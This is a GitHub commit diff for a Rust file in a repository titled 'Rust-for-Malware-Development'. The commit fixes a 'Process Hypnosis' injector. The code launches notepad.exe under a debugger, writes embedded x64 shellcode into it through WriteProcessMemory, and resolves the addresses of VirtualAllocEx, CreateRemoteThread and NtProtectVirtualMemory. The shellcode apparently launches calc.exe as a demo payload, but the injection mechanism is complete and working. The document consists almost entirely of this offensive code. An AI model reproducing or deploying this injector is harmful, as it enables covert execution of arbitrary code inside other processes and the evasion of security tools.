Skip to content

Commit 041bbfb

Browse files
Whitecat18Whitecat18
committed
Fixed Process Hypnosis
1 parent e958dac commit 041bbfb

File tree

1 file changed

+103
-81
lines changed

1 file changed

+103
-81
lines changed

Process/hypnosis.rs

Lines changed: 103 additions & 81 deletions
Original file line numberDiff line numberDiff line change
@@ -1,30 +1,24 @@
1-
21
/*
3-
Process_Hypnosis [Beta]
2+
Process_Hypnosis [Fixed]
43
For more Codes: https://github.com/Whitecat18/Rust-for-Malware-Development.git
4+
References used:
5+
https://github.com/CarlosG13/Process-Hypnosis-Debugger-assisted-control-flow-hijack.git
6+
https://github.com/joaoviictorti/RustRedOps/tree/main/Process_Hypnosis
7+
58
@5mukx
69
710
*/
811

9-
10-
// Please Note: I Have been trying for hours to find the error occuring at ReadProcessMemory(1). So if
11-
// Anyone Finds it. Please dm me. I will try my best to research and Fix ASAP >! Luv u ALL ...
12-
1312
use std::{ffi::OsStr, os::windows::ffi::OsStrExt, ptr::null_mut};
1413

15-
// use widestring::U16String;
16-
// ConvertThreadToFiber(null_mut());
17-
// SwitchToFiber(fiber_addr);
18-
// }
19-
// }
2014
use winapi::{
21-
ctypes::{c_char, c_uchar, c_void},
15+
ctypes::{c_char, c_void},
2216
um::{debugapi::{ContinueDebugEvent, DebugActiveProcessStop, WaitForDebugEvent},
2317
errhandlingapi::GetLastError,
2418
memoryapi::{ReadProcessMemory, WriteProcessMemory},
2519
minwinbase::{DEBUG_EVENT, EXCEPTION_BREAKPOINT, LOAD_DLL_DEBUG_EVENT},
26-
processthreadsapi::{CreateProcessW, PROCESS_INFORMATION, STARTUPINFOW}
27-
}};
20+
processthreadsapi::{CreateProcessW, PROCESS_INFORMATION, STARTUPINFOW}}
21+
};
2822

2923
macro_rules! okey {
3024
($msg:expr, $($arg:expr), *) => {
@@ -43,8 +37,6 @@ macro_rules! error {
4337
type BOOL = i32;
4438
type HANDLE = *mut c_void;
4539

46-
use windows_sys::core::s;
47-
4840
fn main(){
4941
let shellcode: [u8; 276] = [
5042
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
@@ -66,7 +58,7 @@ fn main(){
6658
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
6759
0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
6860
0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,
69-
];
61+
];
7062

7163
unsafe{
7264
let mut debug_info: DEBUG_EVENT = std::mem::zeroed();
@@ -76,61 +68,51 @@ fn main(){
7668

7769
let mut process_info: PROCESS_INFORMATION = std::mem::zeroed();
7870

79-
// let path_name = U16String::from_str(r#"C:\Windows\Systen32\calc.exe"#);
80-
// let mut path_name:Vec<u16> = "C:\\Windows\\Systen32\\notepad.exe\0".encode_utf16().collect();
81-
// let path_name:Vec<u16> = OsStr::new("C\\Windows\\System32\\notepad.exe")
82-
// .encode_wide().chain(Some(0).into_iter()).collect();
83-
8471
let path_name: Vec<u16> = OsStr::new("C:\\Windows\\System32\\notepad.exe")
85-
.encode_wide()
86-
.chain(std::iter::once(0))
87-
.collect();
88-
89-
// let cmd_line_ptr = cmd_line.as_ptr();
72+
.encode_wide()
73+
.chain(std::iter::once(0))
74+
.collect();
9075

9176
let create_process = CreateProcessW(
9277
null_mut(),
9378
path_name.as_ptr() as *mut u16,
9479
null_mut(),
9580
null_mut(),
9681
0,
97-
// DEBUG_ONLY_THIS_PROCESS as u32, // DEBUG_ONLY_THIS_PROCESS 0x00000002
9882
winapi::um::winbase::DEBUG_ONLY_THIS_PROCESS,
9983
null_mut(),
10084
null_mut(),
10185
&mut startup_info,
10286
&mut process_info,
10387
);
104-
10588

10689
if create_process == 0{
10790
println!("Break 1");
108-
error!("CreateProcessW Failed: {}",GetLastError());
91+
error!("CreateProcessW Failed: {}", GetLastError());
10992
}
110-
// println!("Break 2");
11193

112-
for num in 0..7{
113-
if WaitForDebugEvent(&mut debug_info, 0xFFFFFFFF) != 0{
94+
for num in 0..7 {
95+
if WaitForDebugEvent(&mut debug_info, 0xFFFFFFFF) != 0 {
11496

115-
match debug_info.dwDebugEventCode{
97+
match debug_info.dwDebugEventCode {
11698
3 => { // CREATE_PROCESS_DEBUG_EVENT
117-
okey!("Process PID: {}",debug_info.dwProcessId);
118-
okey!("Thread ID: {}",debug_info.dwThreadId);
99+
okey!("Process PID: {}", debug_info.dwProcessId);
100+
okey!("Thread ID: {}", debug_info.dwThreadId);
119101
okey!("StartAddress: {:?}", debug_info.u.CreateProcessInfo().lpStartAddress.unwrap());
120-
okey!("Main Thread: {:?}",debug_info.u.CreateProcessInfo().hThread);
102+
okey!("Main Thread: {:?}", debug_info.u.CreateProcessInfo().hThread);
121103
},
122104

123105
2 => { // CREATE_THREAD_DEBUG_EVENT
124106
println!();
125107
okey!("Thread Created: {:?}", debug_info.u.CreateThread().lpStartAddress);
126-
okey!("Thread Handle: {:?}",debug_info.u.CreateProcessInfo().hThread);
127-
okey!("Thread ThreadLocalBase: {:?}",debug_info.u.CreateThread().lpThreadLocalBase);
108+
okey!("Thread Handle: {:?}", debug_info.u.CreateThread().hThread);
109+
okey!("Thread ThreadLocalBase: {:?}", debug_info.u.CreateThread().lpThreadLocalBase);
128110
},
129111

130-
LOAD_DLL_DEBUG_EVENT => { // LOAD_DLL_DEBUG_EVENT // 6
112+
LOAD_DLL_DEBUG_EVENT => { // LOAD_DLL_DEBUG_EVENT
131113
let mut buffer = [0u8; std::mem::size_of::<*mut c_void>()];
132114
let mut return_number = 0;
133-
115+
134116
let success = ReadProcessMemory(
135117
process_info.hProcess,
136118
debug_info.u.LoadDll().lpImageName as *mut c_void,
@@ -139,28 +121,25 @@ fn main(){
139121
&mut return_number,
140122
);
141123

142-
// println!(" --> {:?}",debug_info.u.LoadDll().lpImageName);
143-
if success == 0{
144-
error!("ReadProcessMemory(1) Failed: {}",GetLastError());
124+
if success == 0 {
125+
error!("ReadProcessMemory(1) Failed: {}", GetLastError());
145126
}
146127

147-
println!();
148-
149128
let dll_address = usize::from_ne_bytes(buffer) as *mut c_void;
150129
let mut image_name = vec![0u16; 260];
151-
130+
152131
okey!("DLL ADDRESS: {:?}", dll_address);
153132

154133
let success = ReadProcessMemory(
155134
process_info.hProcess,
156135
dll_address,
157136
image_name.as_mut_ptr() as _,
158-
image_name.len(),
137+
image_name.len() * std::mem::size_of::<u16>(),
159138
&mut return_number,
160139
);
161140

162-
if success == 0{
163-
error!("ReadProcessMemory(2) Failed: {}",GetLastError());
141+
if success == 0 {
142+
error!("ReadProcessMemory(2) Failed: {}", GetLastError());
164143
}
165144

166145
if let Some(first_null) = image_name.iter().position(|&c| c == 0) {
@@ -171,17 +150,15 @@ fn main(){
171150
okey!("DLL Name: {}", dll_name.trim_end_matches('\0'));
172151
okey!("DLL Base Address: {:?}", debug_info.u.LoadDll().lpBaseOfDll);
173152
okey!("DLL H_File: {:?}", debug_info.u.LoadDll().hFile);
174-
175153
},
176154

177155
1 => { //EXCEPTION_DEBUG_EVENT
178156
if debug_info.u.Exception().ExceptionRecord.ExceptionCode == EXCEPTION_BREAKPOINT {
179-
okey!("BreakPoint Successfully Triggered {}",'!');
157+
okey!("BreakPoint Successfully Triggered {}", '!');
180158
}
181-
},
159+
},
182160

183161
_ => {}
184-
185162
}
186163

187164
if num == 6 {
@@ -194,27 +171,26 @@ fn main(){
194171
&mut number_of_write,
195172
);
196173

197-
if success == 0{
198-
error!("WriteProcessMemory Failed: {}",GetLastError());
174+
if success == 0 {
175+
error!("WriteProcessMemory Failed: {}", GetLastError());
199176
}
200177

201178
let active_proc = DebugActiveProcessStop(process_info.dwProcessId);
202179

203-
if active_proc == 0{
204-
error!("DebugActiveProcessStop Failed: {}",GetLastError());
180+
if active_proc == 0 {
181+
error!("DebugActiveProcessStop Failed: {}", GetLastError());
205182
}
206183
}
207184

208-
209185
if num < 6 {
210186
let dbg_continue = ContinueDebugEvent(
211187
process_info.dwProcessId,
212188
process_info.dwThreadId,
213189
0x00010002, // DBG_CONTINUE
214190
);
215-
216-
if dbg_continue == 0{
217-
error!("ContinueDebugEvent Failed: {}",GetLastError());
191+
192+
if dbg_continue == 0 {
193+
error!("ContinueDebugEvent Failed: {}", GetLastError());
218194
}
219195
}
220196
}
@@ -226,68 +202,69 @@ fn main(){
226202
1
227203
);
228204

229-
if sym_success == 0{
230-
error!("SymInitialize Error: {}",GetLastError());
205+
if sym_success == 0 {
206+
error!("SymInitialize Error: {}", GetLastError());
231207
}
232208

233209
let mut symbol: SYMBOL_INFO = std::mem::zeroed();
234210
symbol.SizeOfStruct = std::mem::size_of::<SYMBOL_INFO>() as u32;
235211

236-
212+
let virtual_alloc_addr: Vec<_> = "VirtualAllocEx".encode_utf16().collect();
237213
let success = SymFromName(
238214
0xffffffffffffffffu64 as _,
239-
s!("VirtualAllocEx"),
215+
virtual_alloc_addr.as_ptr(),
240216
&mut symbol
241217
);
242218

243-
if success == 0{
244-
error!("SymFromName Failed: {:?}",GetLastError());
219+
if success == 0 {
220+
error!("SymFromName Failed: {:?}", GetLastError());
245221
}
246222

247223
okey!("Example Addr of VirtualAllocEx: {:?}", symbol.Address as *mut c_void);
248224

225+
let create_remote_thread: Vec<_> = "CreateRemoteThread".encode_utf16().collect();
249226
let success = SymFromName(
250227
0xffffffffffffffffu64 as _,
251-
s!("CreateRemoteThread"),
228+
create_remote_thread.as_ptr(),
252229
&mut symbol
253230
);
254231

255-
if success == 0{
256-
error!("SymFromName Failed: {:?}",GetLastError());
232+
if success == 0 {
233+
error!("SymFromName Failed: {:?}", GetLastError());
257234
}
258235

259236
okey!("Example Addr of CreateRemoteThread: {:?}", symbol.Address as *mut c_void);
260237

238+
let nt_protect_memory: Vec<_> = "NtProtectVirtualMemory".encode_utf16().collect();
261239
let success = SymFromName(
262240
0xffffffffffffffffu64 as _,
263-
s!("NtProtectVirtualMemory"),
241+
// s!("NtProtectVirtualMemory"),
242+
nt_protect_memory.as_ptr(),
264243
&mut symbol
265244
);
266245

267-
if success == 0{
268-
error!("SymFromName Failed: {:?}",GetLastError());
246+
if success == 0 {
247+
error!("SymFromName Failed: {:?}", GetLastError());
269248
}
270249

271250
okey!("Example Addr of NtProtectVirtualMemory: {:?}", symbol.Address as *mut c_void);
272251
}
273-
274252
}
275253

276-
277254
#[link(name = "Dbghelp")]
278255
#[allow(non_snake_case)]
279256
extern "system" {
280257
pub fn SymInitialize(
281258
hProcess: HANDLE,
282-
UserSearchPath: *const c_char , // *const c_char
259+
UserSearchPath: *const c_char,
283260
fInvadeProcess: BOOL,
284261
) -> BOOL;
285262
}
286263

287264
extern "system" {
288265
pub fn SymFromName(
289266
hprocess: HANDLE,
290-
name: *const c_uchar,
267+
name: *const u16,
291268
symbol: *mut SYMBOL_INFO
292269
) -> BOOL;
293270
}
@@ -299,7 +276,6 @@ pub struct SYMBOL_INFO_FLAGS(pub u32);
299276
#[allow(non_snake_case,non_camel_case_types)]
300277
#[repr(C)]
301278
pub struct SYMBOL_INFO {
302-
303279
pub SizeOfStruct: u32,
304280
pub TypeIndex: u32,
305281
pub Reserved: [u64; 2],
@@ -319,6 +295,52 @@ pub struct SYMBOL_INFO {
319295

320296
#[repr(transparent)]
321297
#[allow(non_camel_case_types)]
322-
pub struct PROCESS_CREATION_FLAGS(pub u32);
298+
pub struct HANDLE_FLAGS(pub u32);
323299

324-
pub const DEBUG_ONLY_THIS_PROCESS: PROCESS_CREATION_FLAGS = PROCESS_CREATION_FLAGS(0x00000002);
300+
#[repr(transparent)]
301+
#[allow(non_camel_case_types)]
302+
pub struct MEMORY_INFORMATION_CLASS(pub u32);
303+
304+
#[repr(transparent)]
305+
#[allow(non_camel_case_types)]
306+
pub struct PVOID(pub *mut c_void);
307+
308+
#[repr(transparent)]
309+
#[allow(non_camel_case_types)]
310+
pub struct PSIZE_T(pub *mut usize);
311+
312+
#[repr(transparent)]
313+
#[allow(non_camel_case_types)]
314+
pub struct PROCESSINFOCLASS(pub u32);
315+
316+
#[repr(transparent)]
317+
#[allow(non_camel_case_types)]
318+
pub struct SECTION_INHERIT(pub u32);
319+
320+
#[repr(transparent)]
321+
#[allow(non_camel_case_types)]
322+
pub struct SIZE_T(pub usize);
323+
324+
#[repr(transparent)]
325+
#[allow(non_camel_case_types)]
326+
pub struct ULONG(pub u32);
327+
328+
#[repr(transparent)]
329+
#[allow(non_camel_case_types)]
330+
pub struct ULONG_PTR(pub usize);
331+
332+
#[repr(transparent)]
333+
#[allow(non_camel_case_types)]
334+
pub struct ULONG64(pub u64);
335+
336+
#[repr(transparent)]
337+
#[allow(non_camel_case_types)]
338+
pub struct USHORT(pub u16);
339+
340+
#[repr(transparent)]
341+
#[allow(non_camel_case_types)]
342+
pub struct WCHAR(pub u16);
343+
344+
#[repr(transparent)]
345+
#[allow(non_camel_case_types)]
346+
pub struct WORD(pub u16);

0 commit comments

Comments
 (0)